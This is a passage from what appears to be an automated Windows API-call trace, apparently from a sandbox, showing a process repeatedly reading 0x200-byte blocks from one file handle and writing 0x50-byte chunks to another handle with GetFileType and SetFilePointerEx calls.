(_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.735] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.735] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.736] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.736] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.737] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.737] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.738] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.738] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] GetFileType (hFile=0x50) returned 0x1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] GetFileType (hFile=0x50) returned 0x1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] GetFileType (hFile=0x50) returned 0x1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] GetFileType (hFile=0x50) returned 0x1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] GetFileType (hFile=0x50) returned 0x1 [0207.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.744] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.744] GetFileType (hFile=0x50) returned 0x1 [0207.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.744] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.744] GetFileType (hFile=0x50) returned 0x1 [0207.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.744] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.744] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.744] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.745] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.746] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.746] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.746] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.746] GetFileType (hFile=0x50) returned 0x1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, 